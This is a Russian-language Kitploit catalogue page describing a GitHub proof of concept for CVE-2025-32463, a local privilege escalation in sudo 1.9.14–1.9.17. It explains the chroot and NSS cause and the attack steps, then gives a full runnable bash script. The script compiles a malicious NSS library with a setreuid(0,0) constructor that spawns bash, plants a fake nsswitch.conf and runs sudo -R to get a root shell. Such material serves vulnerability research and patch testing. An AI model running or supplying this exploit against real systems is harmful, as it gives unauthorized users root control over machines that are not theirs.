Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-32463 — Эксплойт, подтверждающий концепцию, для CVE-2025-32463 — локальное повышение привилегий в sudo 1.9.14-1.9.17 через неправильную конфигурацию chroot и внедрение вредоносной библиотеки NSS. | Kitploit
Инструменты/GitHubGitHub/mr-alperen/cve-2025-32463
Повышение привилегийАнализ уязвимостейЭксплуатацияСтатьи и ИсследованияОбучение и ОбразованиеЭксплуатация Бинарных Файлов
GitHubmr-alperen/cve-2025-32463

CVE-2025-32463

Эксплойт, подтверждающий концепцию, для CVE-2025-32463 — локальное повышение привилегий в sudo 1.9.14-1.9.17 через неправильную конфигурацию chroot и внедрение вредоносной библиотеки NSS.

Репозиторий
18 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

📌 CVE-2025-32463 — Sudo --chroot локальное повышение привилегий

ExploitDB ID: 52352


🧠 Обзор

Этот репозиторий документирует критическую уязвимость локального повышения привилегий (LPE), затрагивающую версии Sudo 1.9.14 – 1.9.17.

Уязвимость вызвана неправильной реализацией опции sudo -R (--chroot) и позволяет атакующему выполнять команды с правами root, даже если это не разрешено в файле sudoers.

🔥 Результат: Неавторизованный пользователь → root shell


🧩 Затронутый компонент

  • Программное обеспечение: sudo
  • Затронутые версии:
    • 1.9.14
    • 1.9.15
    • 1.9.16
    • 1.9.17
  • CVE ID: CVE-2025-32463
  • Платформа: Linux (особенно системы, использующие NSS)
  • Протестированная система: Kali Rolling 2025

⚙️ Техническая причина уязвимости

Параметр --chroot (-R) в sudo позволяет пользователю выполнять команды в указанном им корневом каталоге.

Однако в результате изменения, внесённого в sudo 1.9.14:

  • Файл sudoers ещё не полностью проверен
  • Вызов chroot() выполняется по указанному пользователем каталогу

Это позволяет атакующему с помощью поддельного файла:

/etc/nsswitch.conf

загрузить вредоносную библиотеку NSS (libnss_*.so) с правами root.


🧨 Сценарий атаки (кратко)

  1. Создаётся временный каталог
  2. Подготавливается поддельный nsswitch.conf
  3. Компилируется вредоносная разделяемая библиотека NSS
  4. Выполняется вызов sudo -R <dir> <command>
  5. Библиотека NSS загружается с правами root
  6. Получена root-оболочка 🚀

🧪 Proof of Concept (PoC)

⚠️ Используйте только в учебных и тестовых средах

root@kitploit:~
#!/bin/bash
# sudo-chwoot.sh – PoC for CVE-2025-32463

set -e

STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd "$STAGE"

cat > woot1337.c <<'EOF'
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor))
void woot(void) {
    setreuid(0,0);
    setregid(0,0);
    chdir("/");
    execl("/bin/bash","/bin/bash",NULL);
}
EOF

mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc

gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c

sudo -R woot woot
Скачать инструмент